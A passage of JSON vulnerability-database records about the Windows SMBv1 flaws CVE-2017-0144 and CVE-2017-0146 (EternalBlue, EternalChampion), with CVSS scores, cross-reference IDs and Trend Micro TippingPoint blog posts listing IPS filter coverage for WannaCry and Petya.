"references", "hash": "95d55efa8ae602b327bf293a3381d168"}, {"key": "reporter", "hash": "aba454e3574969396c0dddcb45011dcc"}, {"key": "title", "hash": "41bcfd3a3826e72c80143f1a952e3cdf"}, {"key": "toolHref", "hash": "97d03efd613b8501d42c93b1d42747ec"}, {"key": "type", "hash": "4553be2119d862322dd6fec6bb385401"}], "hash": "802381a7d63d82558cabd735eca417dec3e11cd01b402fe60311a939491bb39c", "viewCount": 170, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0144"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198"]}, {"type": "symantec", "idList": ["SMNTC-96704"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:42031", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:47456"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-33313"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", 
"THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "thn", "idList": ["THN:E18080D17705880B2E7B69B8AB125EA9", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-07-28T14:35:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-07-28T14:35:34", "rev": 2}}, "objectVersion": "1.6", "toolHref": "https://github.com/peterpt/eternal_scanner", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "seebug": [{"type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "_object_type": "robots.models.seebug.SeebugBulletin", "viewCount": 43, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2017-11-19T11:59:54", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203"]}, {"type": "symantec", "idList": ["SMNTC-96707"]}, {"type": "saint", "idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-11-19T11:59:54", "rev": 2}}, "reporter": "Root", "title": "EternalChampion - Windows SMB Remote Code Execution Vulnerability (CVE-2017-0146)", "objectVersion": "1.5", "cvelist": ["CVE-2017-0146"], "bulletinFamily": "exploit", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "references": [], "enchantments_done": [], "modified": "2017-04-17T00:00:00", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\r\n\r\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\r\n\r\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.", "href": "https://www.seebug.org/vuldb/ssvid-92964", "history": [], "id": "SSV:92964", "status": "cve,details", "lastseen": "2017-11-19T11:59:54", "sourceData": "", "published": "2017-04-17T00:00:00", "immutableFields": [], "cvss2": {}, "cvss3": {}}], "trendmicroblog": [{"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-26-2017/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "history": [], "modified": "2017-06-30T12:00:57", "lastseen": "2017-06-30T14:19:55", "published": "2017-06-30T12:00:57", "description": "![](http://blog.trendmicro.com/wp-content/uploads/2016/04/TP-WeeklyBlog-300x205-300x205.jpg)\n\nThe late 70s/early 80s American television show _Three\u2019s Company_ was one of my favorite shows growing up. The central theme of the show revolved around the lives of three roommates. Each episode usually involved a misunderstanding, then chaos would ensue. In the end, everything would turn out okay. Unfortunately, this week\u2019s episode of \u201cransomware in the news\u201d isn\u2019t over \u2013 there are still misunderstandings about the latest attack named \u201cPetya,\u201d even on what to call it!\n\nThis past Tuesday, a ransomware attack similar to WannaCry shut down computers all over the world. It was initially thought that this new attack was an updated version of Petya from 2016. 
Others said it was a whole new malware that had Petya characteristics. Even further, now there is speculation that it\u2019s not ransomware at all \u2013 that its objective was to permanently destroy data. No extortion \u2013 just destruction \u2013 and no happy ending to this week\u2019s episode.\n\nTrend Micro TippingPoint continues to actively review the situation in order to recommend coverage for customers using TippingPoint solutions. As of this blog posting, we have verified the following vulnerability Digital Vaccine\u00ae (DV) filters that protect against the propagation of the Petya ransomware listed in the table below:\n\n \n\n**CVE Number** | **DV Filter(s)** | **Category** | **Default Deployment** | **Comments** \n---|---|---|---|--- \nCVE-2017-0144\n\nCVE-2017-0146 | 27298 | Vulnerabilities | Disabled | SMB: Microsoft Windows SMB Remote Code Execution Vulnerability (EternalBlue) \nCVE-2017-0147 | 27931 | Vulnerabilities | Disabled | SMB: Microsoft Windows SMBv1 Information Disclosure Vulnerability (EternalRomance) \n \n \n\nCustomers who wish to enforce generic policy at the network perimeter can use the following security policy filter to block all inbound SMBv1 traffic:\n\n \n\n**CVE Number** | **DV Filter(s)** | **Category** | **Default Deployment** | **Comments** \n---|---|---|---|--- \nNone | 28471 | Security Policy | Disabled | SMB: SMBv1 Successful Protocol Negotiation \n \n \n\nCustomers with questions or who need technical assistance can contact the TippingPoint Technical Assistance Center (TAC). For further information related to Trend Micro\u2019s response and our recommendations as a whole, please visit <https://success.trendmicro.com/solution/1117665>.\n\n \n\n**Zero-Day Filters**\n\nThere are nine new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. 
A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) web site.\n\n \n\n**_Foxit (4)_**\n\n * 28746: ZDI-CAN-4721: Zero Day Initiative Vulnerability (Foxit Reader)\n * 28747: ZDI-CAN-4722: Zero Day Initiative Vulnerability (Foxit Reader)\n * 28748: ZDI-CAN-4723: Zero Day Initiative Vulnerability (Foxit Reader)\n * 28749: ZDI-CAN-4855: Zero Day Initiative Vulnerability (Foxit Reader)\n\n**_ _**\n\n**_Hewlett Packard Enterprise (1)_**\n\n * 28898: ZDI-CAN-4869: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n\n**_ _**\n\n**_Quest (4)_**\n\n * 28751: ZDI-CAN-4224,4225,4229-4235,4237,4286,4316: Zero Day Initiative Vulnerability(Quest NetVault Backup)\n * 28893: ZDI-CAN-4226-4228: Zero Day Initiative Vulnerability (Quest NetVault Backup)\n * 28894: ZDI-CAN-4238,4287,4289,4292,4294: Zero Day Initiative Vulnerability (Quest NetVault Backup)\n * 28896: ZDI-CAN-4752: Zero Day Initiative Vulnerability (Quest NetVault Backup)\n\n**_ _**\n\n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-19-2017/>).", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 26, 2017", "cvelist": ["CVE-2017-0144", "CVE-2017-0147", "CVE-4226-4228", "CVE-2017-0146"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 204, "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2017-06-30T14:19:55", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": 
["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96704", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147", "MS:CVE-2017-0144", "MS:CVE-2017-0146"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "securelist", "idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", 
"THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}], "modified": "2017-06-30T14:19:55", "rev": 2}}, "reporter": "Elisa Lippincott (TippingPoint Global Product Marketing)", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "trendmicroblog", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-05-19T12:00:15", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2017-05-19T12:47:34", "rev": 2}, "dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2017-3072", "RH:CVE-2017-3071", "RH:CVE-2017-3068", "RH:CVE-2017-3069", "RH:CVE-2017-3070", "RH:CVE-2017-3074", "RH:CVE-2017-3073"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "archlinux", "idList": ["ASA-201705-9", "ASA-201705-8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811192", "OPENVAS:1361412562310811102", "OPENVAS:1361412562310811106", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310811103", "OPENVAS:1361412562310811104", "OPENVAS:1361412562310811105", "OPENVAS:1361412562310811101", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11008"]}, {"type": "nessus", "idList": ["MACOSX_FLASH_PLAYER_APSB17-15.NASL", "700059.PRM", "GENTOO_GLSA-201705-12.NASL", "REDHAT-RHSA-2017-1219.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700091.PRM", "MS17-010.NASL", "FLASH_PLAYER_APSB17-15.NASL", "SMB_NT_MS17_MAY_4020821.NASL", "SUSE_SU-2017-1238-1.NASL"]}, {"type": "mscve", "idList": ["MS:ADV170006"]}, {"type": "gentoo", "idList": 
["GLSA-201705-12"]}, {"type": "redhat", "idList": ["RHSA-2017:1219"]}, {"type": "suse", "idList": ["SUSE-SU-2017:1238-1"]}, {"type": "cve", "idList": ["CVE-2017-3074", "CVE-2017-0145", "CVE-2017-3070", "CVE-2017-3071", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-3069", "CVE-2017-3073", "CVE-2017-0147", "CVE-2017-3072", "CVE-2017-3068", "CVE-2017-0146"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-3070", "UB:CVE-2017-3074", "UB:CVE-2017-3073", "UB:CVE-2017-3072", "UB:CVE-2017-3069", "UB:CVE-2017-3068", "UB:CVE-2017-3071"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": 
"checkpoint_advisories", "idList": ["CPAI-2017-0386", "CPAI-2017-0383", "CPAI-2017-0177", "CPAI-2017-0390", "CPAI-2017-0385", "CPAI-2017-0392", "CPAI-2017-0388"]}], "modified": "2017-05-19T12:47:34", "rev": 2}}, "id": "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "objectVersion": "1.5", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 15, 2017", "bulletinFamily": "blog", "viewCount": 276, "reporter": "Elisa Lippincott (TippingPoint Global Product Marketing)", "references": [], "enchantments_done": [], "type": "trendmicroblog", "_object_type": "robots.models.rss.RssBulletin", "history": [], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "![](http://blog.trendmicro.com/wp-content/uploads/2016/04/TP-WeeklyBlog-300x205-300x205.jpg)\n\n\u201cAre you crying? ARE YOU CRYING? There\u2019s no crying! THERE\u2019S NO CRYING IN BASEBALL!\u201d Those famous words from Jimmy Dugan (portrayed by Tom Hanks) in the 1992 movie _A League of their Own_, ring true in the world of baseball. Unfortunately, in the cyber security world, there has been some crying this week with the outbreak of WannaCry, which is being dubbed the biggest global ransomware attack to date. 
WannaCry is taking advantage of a recently disclosed Microsoft vulnerability ([MS17-010 \u2013 \u201cEternalBlue\u201d](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) associated with the Shadow Brokers tools release, and news outlets are reporting that as many as 300,000 computers in 150 countries have been infected with the malware.\n\nFor customers using TippingPoint solutions, we have identified the following Digital Vaccine\u00ae (DV) filters that should help you protect against the exploits listed in the table below:\n\n**CVE #** | **Digital Vaccine Filter #** | **Category** | **Comments** \n---|---|---|--- \nCVE-2017-0143 | 27433 | Exploit | SMB: Server MID Type Confusion Vulnerability \nCVE-2017-0144 | 27928 | Vulnerabilities | SMB: Remote Code Execution Vulnerability (EternalBlue) \nCVE-2017-0145 | 27711 | Exploit | SMB: Server SMBv1 Buffer Overflow Vulnerability \nCVE-2017-0146 | 27928, 27929 | Vulnerabilities | SMB: Remote Code Execution Vulnerabilities (EternalChampion)\n\n \n\nSMB: Remote Code Execution Vulnerability (EternalBlue) \nCVE-2017-0147 | 27929, 27937 | Vulnerabilities | SMB: Remote Code Execution Vulnerability (EternalBlue)\n\n \n\nSMB: NT_TRANSACT_RENAME Information Disclosure Vulnerability (EternalSynergy) \n| 2176 | Security Policy | SMB: Null Session SetUp \n| 11403 | Security Policy | SMB: Suspicious SMB Fragmentation \n| 27935 | Exploit | SMB: DoublePulsar Backdoor \n| 5614 | Exploit | SMB: Malicious SMB Probe/Attack \n| 30623 | Virus (ThreatDV) | TLS: Suspicious SSL Certificate (DGA) \n \n \n\nIn addition to the DV coverage already provided by TippingPoint, customers who subscribe to our ThreatDV service received additional coverage for the WannaCry/WCRY ransomware vulnerability prior to the usual ThreatDV weekly distribution time. 
The following filters can be used to prevent the download of the binary files which are known to infect target machines with the ransomware:\n\n| \n\n * 28304: TCP: Ransom_WCRY.I Download Attempt (Specific)\n * 28305: TCP: Ransom_WCRY.I Download Attempt (Generic) \n---|--- \n| \n \nFor further information related to Trend Micro\u2019s response to WannaCry and our recommendations as a whole, please visit <https://success.trendmicro.com/solution/1117391>.\n\nFor information on indicators showing interception or blocking of WannaCry, please visit <https://success.trendmicro.com/solution/1117402-indicators-showing-interception-blocking-of-wcry-wannacry-ransomware>.\n\n**While Everyone was Freaking Out with WannaCry\u2026**\n\nApple had a doozy of a month with their release of [seven updates](<https://support.apple.com/en-us/HT201222>) addressing 66 unique 